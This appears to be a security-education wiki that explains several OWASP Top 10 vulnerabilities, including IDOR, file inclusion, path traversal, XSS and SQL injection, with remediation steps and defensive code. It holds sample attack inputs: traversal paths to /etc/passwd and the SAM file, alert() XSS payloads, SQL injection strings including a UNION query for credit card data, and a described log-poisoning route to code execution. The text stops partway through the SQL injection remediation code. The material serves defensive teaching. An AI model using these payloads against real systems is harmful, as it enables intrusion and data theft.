Welcome to Haxoris Wiki!

Haxoris Logo

Haxoris Wiki is your comprehensive resource for understanding the vulnerabilities detailed in your reports. Our goal is to provide clear and concise descriptions of each vulnerability, along with effective remediation strategies.

Whether you're a security professional, developer, or just someone interested in cybersecurity, Haxoris Wiki offers valuable insights into the world of vulnerabilities. Explore our chapters to learn more about each type of vulnerability and how to address them effectively.

Happy learning and stay secure!

WEB - OWASP TOP 10

The OWASP Top 10 is the gold standard for web application security, outlining the most critical security risks that modern applications face. Published by the Open Web Application Security Project (OWASP), the list is updated periodically to reflect the latest threats, attack techniques, and vulnerabilities that put businesses and users at risk. Whether you're a developer, security professional, or business owner, understanding these risks is essential to protecting your applications and data.

What’s in the OWASP Top 10?

The OWASP Top 10 highlights some of the most common and dangerous vulnerabilities, such as:

  • Injection Attacks – SQL, NoSQL, and command injection that allow attackers to manipulate databases and applications.
  • Broken Authentication – Weak authentication mechanisms that enable unauthorized access.
  • Security Misconfigurations – Improperly configured servers, frameworks, or apps that leave security holes open.
  • Vulnerable Components – Outdated libraries, plugins, or software dependencies that expose applications to attacks.

Each of these vulnerabilities presents a serious risk, and attackers actively exploit them to steal data, compromise systems, and gain unauthorized access.

How We Help You Stay Secure

We provide comprehensive information about the OWASP Top 10 vulnerabilities, including:

  • Description of each security risk.
  • Examples of how attackers exploit them.
  • Practical remediation strategies to fix and prevent vulnerabilities.

Our goal is to help developers, security engineers, and businesses strengthen their security posture by identifying and eliminating these threats before they can be exploited. Whether you're looking for technical deep dives or straightforward mitigation steps, our resources give you everything you need to build and maintain secure applications.

Stay ahead of attackers—understand and defend against the OWASP Top 10 today!

Broken Access Control

Broken Access Control is a critical security risk that occurs when applications fail to enforce proper authorization, allowing attackers to access, modify, or delete sensitive data and perform unauthorized actions. These vulnerabilities arise when restrictions on what authenticated users can do are not correctly implemented, leading to data breaches, privilege escalation, and system compromise. Attackers exploit these flaws by bypassing access controls through parameter manipulation, forced browsing, or privilege escalation techniques.

Common Vulnerabilities:

- Insecure Direct Object References (IDOR)
- Missing or Weak Authorization Checks
- Privilege Escalation (Horizontal & Vertical)
- Forced Browsing (Accessing Hidden Endpoints)
- Improper Session Handling
- Bypassing Access Controls via Parameter Manipulation

To mitigate these risks, applications should enforce role-based access control (RBAC), implement least privilege policies, validate permissions on every request, use secure indirect object references, and regularly test access controls to prevent unauthorized access.

Insecure Direct Object Reference (IDOR)

Description

Insecure Direct Object Reference (IDOR) is a type of access control vulnerability that occurs when an application directly uses user-supplied input to access internal objects (e.g., database entries, files, or other resources) without proper authorization checks. In other words, the application references an object (like a record in a database) by a parameter (for instance, a numeric ID) that a user can manipulate. If there is no robust mechanism to verify that the user has permission to access or modify that particular object, the door is left open for attackers to escalate privileges or view and edit data they should not have access to.

IDOR often stems from insufficient or missing access control logic. Applications may assume that if someone has a valid session or is already authorized at a certain level, all object references they provide must be valid for them. This assumption fails when attackers deliberately change parameters and gain access to resources belonging to other users or system records that should be restricted.

Examples

Changing User Account IDs

Suppose a web application profile management page uses a URL like:

https://example.com/user/profile?id=12345

The application retrieves user details for the user with ID 12345 and displays them. If there is no verification that the logged-in user actually owns or has the right to access user 12345's data, an attacker could change this parameter to another ID:

https://example.com/user/profile?id=67890

This could reveal another user's profile or allow it to be edited.

Direct File Reference

An application might store documents in a system accessible by references like:

https://example.com/documents?file=invoice_12345.pdf

If the application fails to validate ownership or permissions, a malicious user could modify the file name parameter to access another user's file, e.g.:

https://example.com/documents?file=invoice_67890.pdf

They might gain access to sensitive information, violating data privacy and confidentiality.

Elevation of Privileges

In some advanced IDOR scenarios, attackers may also manipulate object references to escalate privileges. For instance, changing a role ID or user group ID within a request that updates account data could grant admin-level access if the application does not validate permissions.

Remediation

  1. Implement Strict Access Control Checks

    • Always validate that the current user is authorized to access or modify the specific resource (a minimal sketch follows this list).
    • Access control logic should be performed server-side, not solely in client-side code or session variables.
  2. Use Indirect References

    • Instead of exposing internal identifiers (e.g., database keys or sequential IDs), map them to unique tokens or opaque references.
    • This prevents attackers from guessing internal resource IDs and eliminates direct object references in user-visible parameters.
  3. Parameter Validation

    • Where direct IDs are necessary, perform checks to confirm that the resource requested belongs to the current user (or that the user has the correct privileges for that resource).
    • Do not rely on hidden form fields or client-side mechanisms for validation—these can be tampered with.
  4. Secure Coding Practices

    • Adopt frameworks and libraries that provide built-in access control mechanisms.
    • Follow the principle of least privilege, granting each user or role only the minimum permissions needed to perform their actions.
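
A minimal sketch of such a server-side ownership check in PHP, assuming a PDO connection and a hypothetical documents table with an owner_id column:

<?php
    session_start();

    // Placeholder connection details; adjust for your environment.
    $pdo = new PDO('mysql:host=localhost;dbname=app', 'app_user', 'secret');

    $documentId    = (int) ($_GET['id'] ?? 0);
    $currentUserId = (int) ($_SESSION['user_id'] ?? 0);   // assumes an authenticated session

    // Fetch the record only if it belongs to the logged-in user.
    $stmt = $pdo->prepare('SELECT * FROM documents WHERE id = ? AND owner_id = ?');
    $stmt->execute([$documentId, $currentUserId]);
    $document = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($document === false) {
        http_response_code(403);   // not found, or not owned by this user
        exit('Access denied');
    }
?>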

Local File Inclusion (LFI)

Description

Local File Inclusion (LFI) is a type of security vulnerability that occurs when a web application includes files on the server without properly validating user input. In most cases, the application receives a file path from a client-side parameter (for example, ?page= in a URL) and dynamically uses this path to include content in the response. If the application does not adequately sanitize or validate that path, attackers can manipulate it to access sensitive files on the host system.

The core issue arises from user input being passed into file handling functions (e.g., include, require in PHP, file reads in other languages) that treat that input as a trusted file path. By leveraging path traversal sequences such as ../, an attacker might be able to read arbitrary files on the server (like system logs, configuration files containing credentials, or even application source code).

LFI can escalate into more severe attacks if attackers manage to include and parse files that contain malicious code or user-submitted content. In some scenarios, LFI can lead to Remote Code Execution (RCE), but even when limited to file reads, it can expose critical information, facilitate further attacks, and compromise privacy.

Examples

Simple Path Traversal

<?php
    // Vulnerable code snippet
    $page = $_GET['page'];  // For example, ?page=index
    include($page);         // No input validation
?>

An attacker could exploit this by passing:

?page=../../../../etc/passwd

attempting to read the server's /etc/passwd file (if permissions allow).

Log File Inclusion Leading to Code Execution

Some applications write user input to server logs. If an attacker can write PHP code into a log (for instance, by manipulating the User-Agent header) and then include that log file via the vulnerable parameter, the PHP code can be executed.

Example request:

GET /vulnerable.php?page=../../../var/log/apache/access.log

where the log file might contain malicious code that the server interprets.

Commonly Targeted Files:

  • /etc/passwd or /etc/shadow on UNIX systems.
  • config.php or wp-config.php in web application directories (leaking database credentials).
  • Error logs or access logs that may contain other exploitable information or even injected malicious code.

These examples highlight how an attacker can leverage unvalidated file inclusion to read system files or escalate the impact through file injection.

Remediation

  1. Input Validation and Whitelisting

    • Never trust user-supplied paths.
    • Maintain an explicit whitelist of allowable file names or paths if dynamic includes are necessary. For example, map user-friendly input values (?page=help) to internal, verified file names (/path/to/help.php); a minimal sketch follows this list.
  2. Parameterized Routing / Avoid Direct include

    • Rather than accepting file paths directly, use a controlled routing mechanism. For example, store all legitimate include files in a single directory and use a lookup table.
    • If a legitimate file must be included, ensure its path is strictly verified (e.g., using realpath checks or directory checks).
  3. Least Privileges and Hardened Server Configuration

    • Limit file system permissions so that the web application user has only the minimum necessary access. This reduces the impact if a vulnerability is exploited.
    • Disable risky settings (like allow_url_include and, where not needed, allow_url_fopen) in the PHP configuration.
    • Consider using open_basedir restrictions in PHP to confine file operations to specific, safe directories.
  4. Filtering and Encoding

    • Remove or encode special characters from user input (e.g., ../) that enable path traversal.
    • In some cases, implementing stringent filtering can reduce exposure to LFI attacks, though whitelisting is typically more secure than blacklisting.
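
A minimal sketch of the whitelist approach from step 1 in PHP, assuming the includable pages live under a templates/ directory:

<?php
    // Map user-friendly page names to verified files; anything else is rejected.
    $pages = [
        'home' => 'templates/home.php',
        'help' => 'templates/help.php',
    ];

    $requested = $_GET['page'] ?? 'home';

    if (!array_key_exists($requested, $pages)) {
        http_response_code(404);
        exit('Unknown page');
    }

    include $pages[$requested];
?>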

Directory Traversal

Description

Directory Traversal (also referred to as Path Traversal) is a security vulnerability that allows attackers to access files or directories outside the intended scope of the web application's file system. This typically occurs when user input specifying a file path is not properly validated or sanitized. Attackers exploit this by inserting special directory traversal characters (e.g., ../) to climb up the directory tree and reveal sensitive system files or application data.

Directory Traversal is often seen in scenarios where applications allow users to download or view files by passing a file name or path as a parameter. If the application's back-end logic simply appends user-provided input to a base directory without further checks, malicious actors can manipulate this path to break out of the expected directory structure. Consequences include unauthorized reading of server files, exposure of credentials, or further exploitation of the host machine.

Directory Traversal vs. Local File Inclusion (LFI)

Directory Traversal lets attackers access arbitrary files by navigating outside intended directories (e.g., /etc/passwd). Local File Inclusion (LFI) allows inclusion of local files in web applications, potentially leading to code execution. While both expose sensitive data, LFI can be more dangerous if exploited for execution.

Examples

Simple ../ Attack

An application might allow users to specify a filename via a URL parameter:

https://example.com/getFile?name=report.pdf

If the server code concatenates name with a directory path, for example "/var/www/files/" + name, and does not sanitize the input, an attacker could send:

https://example.com/getFile?name=../../etc/passwd

This might expose the content of /etc/passwd (if permissions allow), providing sensitive information about user accounts on the server.

Windows Environments

On Windows servers, directory traversal often uses backslashes (..\) instead of forward slashes. For instance:

https://example.com/getFile?name=..\..\Windows\System32\config\SAM

which could reveal critical system registry data under certain conditions.

Chained with Other Vulnerabilities

Directory Traversal vulnerabilities can sometimes be chained with other attacks:

  • Local File Inclusion (LFI): An attacker can leverage path traversal in an LFI scenario to include sensitive files in the application's output or potentially execute scripts.
  • Log File Poisoning: If an application allows manipulation of file paths and logs, an attacker may inject malicious content into logs and then retrieve or execute that content via directory traversal.

Remediation

  1. Strict Input Validation and Sanitization

    • Remove or encode any directory traversal sequences (e.g., ../ or ..\) from user inputs.
    • Restrict file names to alphanumeric characters and whitelisted file extensions when possible.
  2. Use Secure File Handling Mechanisms

    • Rely on server-side logic that enforces a predefined file directory or store allowed file references in a secure mapping.
    • Avoid passing raw user input directly into file system calls. Instead, map user-requested filenames to verified internal paths (see the sketch after this list).
  3. Enforce Least Privilege and Directory Restrictions

    • Run the application with the minimum privileges necessary.
    • Configure your web server and file system so that the application process has access only to the directories it needs. For instance, use mechanisms like chroot jails, SELinux policies, or Docker containers to confine the application's file system access.
  4. Use Built-In Security Features

    • If your programming language or framework offers built-in file handling functions with path normalization or sandboxing, leverage them.
    • For instance, in Java, java.nio.file.Files and java.nio.file.Paths can help normalize paths and reduce the risk of directory traversal.
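
A minimal sketch of such a containment check in PHP, assuming downloadable files live under a fixed base directory (the path and parameter name are illustrative):

<?php
    // Assumed storage directory for downloadable files.
    $baseDir   = realpath('/var/www/files');
    $requested = realpath($baseDir . '/' . ($_GET['name'] ?? ''));

    // Reject the request if the resolved path escapes the base directory.
    if ($requested === false || strpos($requested, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(403);
        exit('Invalid file');
    }

    header('Content-Type: application/octet-stream');
    readfile($requested);
?>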

Authorization Bypass

Description

Authorization Bypass is a security flaw in which an application fails to properly enforce permissions, allowing attackers to access resources or perform actions they should not be permitted to. It typically stems from weak or incomplete access control logic. Even when a user does not hold the required privileges, they can sidestep checks through techniques such as guessing direct links, manipulating parameters, or exploiting improper session validation to reach restricted areas or execute restricted functions. In some cases, developers assume client-side or partial checks are sufficient, leaving server-side routes or endpoints unprotected.

Authorization Bypass can have serious consequences, including unauthorized data access, privilege escalation, tampering with sensitive records, or performing administrative actions that compromise the entire application.

Examples

Direct URL Access

An application has administrative pages only meant for admin roles, for instance:

https://example.com/admin/dashboard

If the server does not verify the user's role when they request the /admin/dashboard path, a non-admin user (or even an unauthenticated visitor) might access it directly by entering the URL in a browser.

Parameter Manipulation

Suppose a request includes a parameter specifying the user role or account type:

 POST /updateUser
 Role: user

If the application accepts a modified request such as:

 POST /updateUser
 Role: admin

without verifying the user's actual permissions on the server side, an attacker could escalate privileges and gain administrator-level capabilities.

Skipping Steps in Multi-Step Processes

Some workflows (e.g., e-commerce checkout or registration) use sequential steps enforced on the client side (e.g., step=1, step=2). An attacker could jump directly to the final step or a restricted step by altering the URL or parameters, bypassing required checks if the server does not maintain strict, step-by-step session validation.

Remediation

  1. Enforce Robust Access Control

    • Implement comprehensive server-side checks for each resource, function, or endpoint.
    • Define clear role-based or permission-based access policies and verify permissions for every request, not just at login or on the client side.
  2. Prevent Parameter Tampering

    • Never rely on hidden fields, cookies, or client-side scripts as the sole means of determining user privileges.
    • Validate any user input against expected values and confirm that the request matches the privileges assigned to the user's session on the server side.
  3. Secure Routing and Endpoint Protection

    • Restrict direct URL access by mapping endpoints to authorized roles.
    • Use a centralized mechanism for permission checks (e.g., middleware, filters) within your framework so the logic is consistent and cannot be bypassed in individual controllers or routes (a minimal sketch follows this list).
  4. Session Management and Integrity

    • Ensure session tokens map to user permissions on every request.
    • Protect session tokens from theft or replay attacks through secure cookies, HTTP-only flags, and encryption as needed.
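
A minimal sketch of a centralized, server-side role check in PHP, assuming the user's role is stored in the session; in a framework this logic usually lives in middleware or a filter:

<?php
    session_start();

    // Hypothetical helper: call it at the top of every protected endpoint.
    function require_role(string $role): void
    {
        if (($_SESSION['role'] ?? null) !== $role) {
            http_response_code(403);
            exit('Forbidden');
        }
    }

    // Example usage for an admin-only endpoint such as /admin/dashboard.
    require_role('admin');
?>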

Cryptographic Failures

Cryptographic Failures occur when sensitive data is not properly protected using encryption, hashing, or secure key management. This can lead to data exposure, unauthorized access, and integrity breaches, especially when weak encryption algorithms, improper key storage, or plaintext data transmission are involved. Attackers exploit these weaknesses to steal credentials, decrypt confidential information, or manipulate encrypted data.

Common Vulnerabilities:

- Use of Weak or Deprecated Cryptographic Algorithms (MD5, SHA-1, DES, RC4)
- Storing Sensitive Data Without Encryption
- Transmission of Data Over Unencrypted Channels (Missing HTTPS/TLS)
- Insecure or Hardcoded Cryptographic Keys
- Lack of Proper Key Management (Reusing or Exposing Keys)
- Improper Implementation of Encryption (Weak Initialization Vectors, ECB Mode Usage, Broken Padding)

To mitigate these risks, applications should use strong encryption standards (AES-256, SHA-256, TLS 1.2+), enforce HTTPS for all data transmission, securely store and rotate cryptographic keys, and follow best practices for hashing passwords (bcrypt, Argon2, PBKDF2). Regular security audits and compliance checks should also be conducted to ensure cryptographic integrity.

SSL/TLS Misconfiguration

Description

SSL/TLS Misconfiguration is a broad category of security issues arising when a web server's Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocols are set up improperly. This includes using outdated protocol versions (such as SSLv3 or early TLS versions), weak or deprecated cipher suites, and incorrect certificate management.

When the TLS setup is not secure, attackers may intercept or tamper with data transmitted between a client and the server. Potential risks include Man-in-the-Middle (MitM) attacks, session hijacking, or exposure of sensitive information. Misconfiguration often arises from default settings, a lack of updates, or improper handling of certificates and keys.

Examples

Use of Deprecated Protocol Versions

Legacy versions like SSLv2, SSLv3, or older TLS (e.g., TLS 1.0) have known vulnerabilities (e.g., POODLE, BEAST). If these protocols remain enabled on the server, an attacker might force a downgrade or exploit those weaknesses to decrypt or modify traffic.

Weak or Insecure Cipher Suites

Even if a modern TLS protocol is in use (e.g., TLS 1.2 or 1.3), misconfiguring the cipher suites can allow connections to occur with RC4, 3DES, or other weak algorithms. Attackers can take advantage of known flaws in those ciphers to compromise the confidentiality or integrity of the data.

Incorrect Certificate Configuration

Common certificate configuration issues include:

  • Self-Signed Certificates: Not trusted by browsers or other clients, leading to warnings or the possibility of an attacker substituting their own certificates.
  • Expired Certificates: Causes errors in client applications and could open the door for MitM attacks if users disregard warnings.
  • Mismatched Hostnames: Certificates not matching the domain name can confuse clients and be exploited by attackers.

Remediation

  1. Enforce Strong TLS Protocols
    • Disable SSLv2, SSLv3, and older TLS versions such as TLS 1.0 and 1.1.
    • Use at least TLS 1.2, and if possible, adopt TLS 1.3 for improved security and performance (a sample server configuration follows this list).
  2. Restrict Cipher Suites
    • Remove weak ciphers such as RC4, 3DES, or those with insufficient key lengths.
    • Prefer modern cipher suites that support forward secrecy (e.g., ECDHE) and strong encryption (e.g., AES-GCM).
  3. Proper Certificate Management
    • Obtain certificates from trusted Certificate Authorities (CAs).
    • Renew certificates before they expire and ensure the domain name (Common Name or Subject Alternative Name) exactly matches your website's address.
    • Store private keys securely and avoid publicly exposing them (e.g., in source repositories).
  4. Implement Strict Transport Security
    • Enable HTTP Strict Transport Security (HSTS) to force browsers to use secure connections only and protect against downgrade attacks.
    • Configure appropriate preload and max-age settings to provide continuous coverage.
  5. Regular Audits and Testing
    • Use SSL/TLS scanning tools (like openssl, nmap, or other specialized scanners) to verify protocol configurations and cipher suite strength.
    • Regularly patch and update server software to apply the latest security patches and recommended configurations.
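
For illustration only, a hardened TLS server block for nginx might look roughly like the following; the certificate paths and cipher list are assumptions to adapt to your environment, not a drop-in configuration:

# Sketch of a hardened nginx TLS configuration
server {
    listen 443 ssl http2;
    server_name example.com;

    ssl_certificate     /etc/ssl/certs/example.com.crt;    # assumed certificate path
    ssl_certificate_key /etc/ssl/private/example.com.key;  # assumed key path

    ssl_protocols TLSv1.2 TLSv1.3;   # SSLv3, TLS 1.0 and TLS 1.1 stay disabled
    ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
    ssl_prefer_server_ciphers on;

    # HSTS: force HTTPS for one year, including subdomains
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
}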

HTTP Strict Transport Security (HSTS)

Description

HTTP Strict Transport Security (HSTS) is a security policy mechanism that helps protect websites against protocol downgrade attacks and cookie hijacking. When a server includes an HSTS header (Strict-Transport-Security) in its response, it instructs compliant browsers to only connect to that site using HTTPS for a specified period of time. As a result, any subsequent visits—whether initiated by the user, a script, or a redirect—will occur over HTTPS, effectively preventing users from mistakenly making insecure HTTP connections.

HSTS improves overall transport security by discouraging the use of vulnerable plain-text connections. It also helps protect against attacks such as SSL stripping, where an attacker might intercept communications and downgrade the connection to HTTP without the user noticing.

Examples

Basic HSTS Header

A simple example of the Strict-Transport-Security header might look like this:

Strict-Transport-Security: max-age=31536000

Here, 31536000 seconds equals one year. This instructs the browser to remember, for the next 365 days, that it must only use HTTPS for this site. If a user or script attempts to connect via HTTP, the browser automatically upgrades the connection to HTTPS, so no insecure request is ever sent.
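
As a minimal sketch, the header can also be emitted from application code in PHP (assuming it runs before any output is sent); in practice it is more often set in the web server or framework configuration:

<?php
    // Instruct compliant browsers to use HTTPS only for this site for one year.
    header('Strict-Transport-Security: max-age=31536000');
?>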

Preload Directive

Some sites add the includeSubDomains and preload directives:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

  • includeSubDomains applies the HSTS policy to all subdomains, ensuring they also enforce secure connections.
  • preload is used by browsers that maintain a preloaded list of HSTS sites. Once a domain is accepted into the preload list, browsers will force HTTPS even for first-time visits, eliminating the possibility of a first insecure request.

Remediation

  1. Serve All Traffic Over HTTPS
    • Ensure you have a valid TLS certificate configured for your domain.
    • Redirect all HTTP requests to the HTTPS version of the site before or as you implement HSTS.
  2. Set Appropriate HSTS Header
    • Decide on a sufficient max-age value (commonly at least 31536000 seconds or 1 year).
    • Consider using includeSubDomains to cover subdomains.
    • Apply preload only if you are confident all subdomains use HTTPS and you intend to submit your domain to browser preload lists.
  3. Incremental Rollout
    • If you are unsure about the readiness of subdomains, start with a smaller max-age and without includeSubDomains.
    • Gradually increase max-age and then add includeSubDomains as you gain confidence that every part of your infrastructure is TLS-secure.

Injection

Injection occurs when an attacker is able to insert malicious input into an application, causing it to execute unintended commands or queries. This vulnerability arises when user input is improperly handled, allowing attackers to manipulate databases, operating systems, or other backend services. Injection attacks can lead to data breaches, unauthorized access, remote code execution (RCE), and full system compromise.

Common Vulnerabilities:

- SQL Injection (SQLi) – Manipulating database queries
- Command Injection – Executing system commands
- Cross-Site Scripting (XSS) – Injecting malicious scripts in web pages
- LDAP Injection – Manipulating directory service queries
- NoSQL Injection – Exploiting NoSQL databases like MongoDB
- XML External Entity (XXE) Injection – Exploiting XML parsers to read local files
- Email Header Injection – Modifying email headers to send spam or phishing emails

To mitigate these risks, applications should use parameterized queries (prepared statements), validate and sanitize user input, escape special characters, enforce content security policies (CSP), and implement least privilege access for backend services. Regular security testing, including automated scans and manual penetration testing, is essential to detect and prevent injection vulnerabilities.

Stored Cross-Site Scripting (XSS)

Description

Stored Cross-Site Scripting (XSS) occurs when a web application accepts user-provided data, stores it on the server (e.g., in a database or file system), and later includes that data within the rendered response without proper output encoding or sanitization. Unlike reflected XSS, where the malicious payload is part of the request and reflected immediately, stored XSS persists on the server side. As a result, any user visiting the affected page (or component) can be silently exposed to the malicious script.

Because the malicious payload is persistent, stored XSS can be more dangerous. It can affect multiple users over time, enabling attackers to steal credentials, hijack sessions, spread malware, or perform unauthorized actions on behalf of victims.

Examples

Inserting Malicious Content in a Comment Field

An attacker posts a comment containing a malicious script on a public forum or blog:

<script>alert('Stored XSS');</script>

If the server stores this comment in a database and later displays it without proper encoding or filtering, every visitor viewing the comment sees the script executed in their browser.

Injecting Scripts in User Profiles

In social networking or user management systems, an attacker might edit their profile (e.g., name or about section) to include harmful JavaScript:

<b onmouseover="alert('Hacked!')">Hover Here</b>

If the application returns that raw HTML to other users—perhaps in a user directory or profile view—they will unintentionally trigger the malicious script when they hover over or load the attacker's profile.

Embedded Scripts in Uploaded Files

Even if a file is not obviously a script, certain formats (like SVG images or PDF documents) can contain executable content. If an attacker uploads a seemingly benign file, but it includes embedded scripts, and the application renders or interprets it in the browser without validation, this can lead to stored XSS.

Remediation

  1. Validate and Sanitize User Input

    • Apply strict validation on all user inputs, especially those destined for storage (e.g., comments, profile fields).
    • Use robust libraries or frameworks designed to handle HTML sanitization (e.g., DOMPurify for JavaScript) to remove or neutralize malicious scripts.
  2. Encode Output Properly

    • Always encode dynamic data before injecting it into HTML pages (e.g., HTML-escaping, JavaScript-string escaping); a minimal sketch follows this list.
    • Follow a context-aware encoding strategy. For instance, values placed in HTML text nodes need HTML encoding, while values inside JavaScript variables require JavaScript string escaping.
  3. Use Content Security Policy (CSP)

    • Deploy a strong Content Security Policy that restricts script execution sources to trusted domains.
    • Consider using CSP directives like script-src, object-src, and default-src to block inline scripts or unauthorized external sources.
  4. Implement Proper Access Controls

    • Restrict which users can upload files or post HTML content, and limit the type of content they can include.
    • Perform server-side checks and moderate or approve user-generated content if the application is highly exposed (e.g., public forums).
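
A minimal sketch of HTML-encoding stored content at render time in PHP; the hard-coded comment stands in for a value fetched from the database:

<?php
    // Stands in for a comment loaded from storage.
    $comment = "<script>alert('Stored XSS');</script>";

    // HTML-encode before output so the payload is rendered as inert text.
    echo '<p>' . htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') . '</p>';
?>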

Reflected Cross-Site Scripting (XSS)

Description

Reflected Cross-Site Scripting (XSS) occurs when an attacker injects malicious code into a vulnerable field or parameter, and that code is immediately included in the subsequent response without being stored on the server. Unlike stored XSS, which persists in the application's database or file system, reflected XSS is transient. The malicious payload is typically part of a crafted URL or form submission that a victim must click or visit.

Because the injected script executes in the context of the victim's browser, it can steal session cookies, hijack accounts, or perform actions on behalf of the victim. Reflected XSS heavily relies on social engineering: attackers must entice or trick users into clicking a specially crafted link or submitting malicious data.

Examples

Malicious Query Parameter

An application includes user-submitted input directly into the response. For instance, a search form:

https://example.com/search?q=someinput

If the server-side code incorporates someinput into the HTML page without proper escaping, an attacker can craft a URL with a malicious script:

https://example.com/search?q=<script>alert('XSS')</script>

When a victim clicks this link, the browser executes the script in the page context.

Form Fields in GET/POST Requests

If a web form takes user data from a POST request and displays it on the page (e.g., an error message or confirmation) without sanitization, an attacker can submit a malicious payload:

<script>alert('Reflected XSS');</script>

The response then reflects this script, causing the browser to run it whenever the victim views the result page.

Remediation

  1. Validate and Sanitize User Input
    • Filter out or neutralize dangerous characters or HTML tags.
    • Use well-maintained libraries or frameworks that handle HTML sanitization and escaping for your language of choice.
  2. Encode Output Correctly
    • Escape all dynamic content when rendering in HTML, JavaScript, or other contexts.
    • For instance, use HTML encoding for data placed in HTML text nodes, and JavaScript encoding for data placed in scripts.
  3. Implement a Content Security Policy (CSP)
    • Configure script-src, object-src, and other directives to restrict script execution (a sample header follows this list).
    • This adds a strong layer of defense if an XSS vector is discovered.
  4. Use Server-Side Security Libraries and Frameworks
    • If your framework supports auto-escaping or context-sensitive encoding, enable it by default.
    • Avoid crafting raw HTML strings by concatenating user input; instead, use templating systems that are XSS-aware.
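
As an illustration of step 3, a restrictive Content-Security-Policy header could be sent like this in PHP; the policy values are assumptions to tailor to your application:

<?php
    // Allow scripts only from this site's own origin; block plugins and inline scripts.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
?>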

DOM-based Cross-Site Scripting (XSS)

Description

DOM-based Cross-Site Scripting (XSS) is a variant of XSS where the entire exploit occurs in the Document Object Model (DOM) within the victim's browser, without sending malicious data to the server. In DOM-based XSS, the vulnerability arises when client-side scripts (e.g., JavaScript) read or write to the DOM using insecure methods (such as document.location, document.write, or innerHTML) with untrusted data. As a result, attackers can manipulate the browser environment to inject and execute malicious code directly.

Because the payload never reaches the server (or is not processed by the server in a vulnerable way), traditional server-side filters and firewalls may fail to detect or block it. DOM-based XSS can be harder to trace and mitigate if developers do not inspect client-side logic carefully.

Examples

Insecure DOM Manipulation

Consider a script that reads a parameter from the URL and sets it as HTML content:

// Example of an insecure snippet
let userParam = new URLSearchParams(window.location.search).get('text');
document.getElementById('output').innerHTML = userParam;

If an attacker crafts a URL like:

https://example.com/page?text=<script>alert('DOM XSS');</script>

the script will inject the untrusted HTML directly into the page's DOM, executing the attacker's payload.

Using location.hash

In single-page applications, developers often store state or data in the URL hash. If a script directly injects the hash value into the DOM, an attacker can pass malicious code in the hash fragment:

// Reading window.location.hash and directly rendering it
let hashContent = window.location.hash.substring(1); // e.g. '#<script>...</script>'
document.getElementById('hashOutput').innerHTML = decodeURIComponent(hashContent);

Anyone visiting a link with a crafted hash (e.g., https://example.com/#%3Cscript%3Ealert('XSS')%3C/script%3E) would execute the attacker's injected script.

Remediation

  1. Safe DOM Manipulation Methods
    • Use APIs that automatically treat user data as text rather than HTML. For instance, use textContent instead of innerHTML.
    • Avoid dynamic insertion of HTML where possible. If absolutely necessary, use robust sanitization libraries (e.g., DOMPurify) to remove dangerous elements.
  2. Proper Encoding and Escaping
    • When setting content in the DOM, ensure it is properly escaped for the appropriate context.
    • For example, if injecting into an HTML context, HTML-encode special characters to prevent script execution.
  3. Validate and Sanitize Input
    • Although DOM-based XSS bypasses the server, validating and restricting the format of query parameters or hash fragments on the client side can reduce malicious opportunities.
    • Use regular expressions, built-in parsers, or sanitization routines to filter out disallowed characters or code.
  4. Content Security Policy (CSP)
    • A well-configured Content Security Policy can reduce the risk of script injection even if some DOM-based vulnerabilities exist.
    • For instance, disallow inline scripts and only allow scripts from trusted sources to limit the effect of malicious injections.

SQL Injection (SQLi)

Description

SQL Injection is a critical web application vulnerability where attackers manipulate user input to alter SQL queries sent to a database. By inserting or "injecting" malicious SQL statements into input fields, attackers can access or modify data far beyond their intended privileges. In severe cases, SQL Injection can lead to complete database compromise, data exfiltration, or even system-level access if the database is integrated with other server components.

This vulnerability typically arises when user input is concatenated directly into a query string without proper sanitization or parameterization. Applications that rely on string manipulation to build SQL statements are especially prone to SQL Injection if they fail to validate and escape user inputs.

Examples

Basic Injection Through Form Input

A typical vulnerable login query might look like this in pseudocode:

SELECT * FROM users WHERE username = 'USER_INPUT' AND password = 'USER_INPUT';

If the application simply places the user's input into the query, an attacker can inject special characters:

  • Username: admin'--
  • Password: anything

Which results in a query:

SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything';

The -- comment syntax causes the password check to be ignored, potentially granting unauthorized access if the record for "admin" exists.

UNION-Based Injection

Attackers can also use the UNION keyword to fetch data from other tables. For example, if the application runs:

SELECT name, email FROM users WHERE id = '$ID';

An attacker might provide a parameter like:

1' UNION SELECT credit_card_number, security_code FROM creditcards --

leading to a query:

SELECT name, email 
FROM users 
WHERE id = '1' UNION SELECT credit_card_number, security_code FROM creditcards --';

Depending on error messages or the way results are rendered, the attacker may extract sensitive data, such as credit card numbers or other protected fields.

Error-Based Injection

Some databases and configurations return error messages revealing detailed SQL engine responses. Attackers can use these messages to refine their injection attempts and glean information about the database schema:

?id=1'

If the server responds with a syntax error mentioning table or column names, the attacker can adjust the query systematically to discover the structure of the database and plan further injections.

Remediation

  1. Use Parameterized Queries (Prepared Statements)

    • Leverage parameterized queries in your application code to ensure user input is treated strictly as data rather than executable SQL.
    • Most modern libraries (e.g., PDO in PHP, PreparedStatement in Java, parameterized queries in .NET or Python) provide robust support for secure query parameterization (see the PDO sketch after this list).
  2. Input Validation and Escaping

    • Validate user input against expected formats (e.g., numeric IDs, specific character sets) before sending to the database.
    • Use context-appropriate escaping for any dynamic SQL components that cannot be avoided (e.g., table names in some dynamic queries).
  3. Least Privilege Principle

    • Configure the database account used by the application to have only the necessary permissions (SELECT, UPDATE on specific tables).
    • Avoid using database accounts with root or admin privileges for routine application queries.
  4. Secure Error Handling

    • Do not display detailed SQL errors or stack traces to end-users.
    • Log detailed errors server-side for debugging but show generic error messages on the client side.
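
A minimal sketch of the login check rewritten with PDO prepared statements; the connection details and the users table's password_hash column are assumptions:

<?php
    // Placeholder connection details; adjust for your environment.
    $pdo = new PDO('mysql:host=localhost;dbname=app', 'app_user', 'secret');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

    // Input is bound as data, so a value like admin'-- can no longer alter the query.
    $stmt = $pdo->prepare('SELECT id, username, password_hash FROM users WHERE username = :username');
    $stmt->execute([':username' => $_POST['username'] ?? '']);
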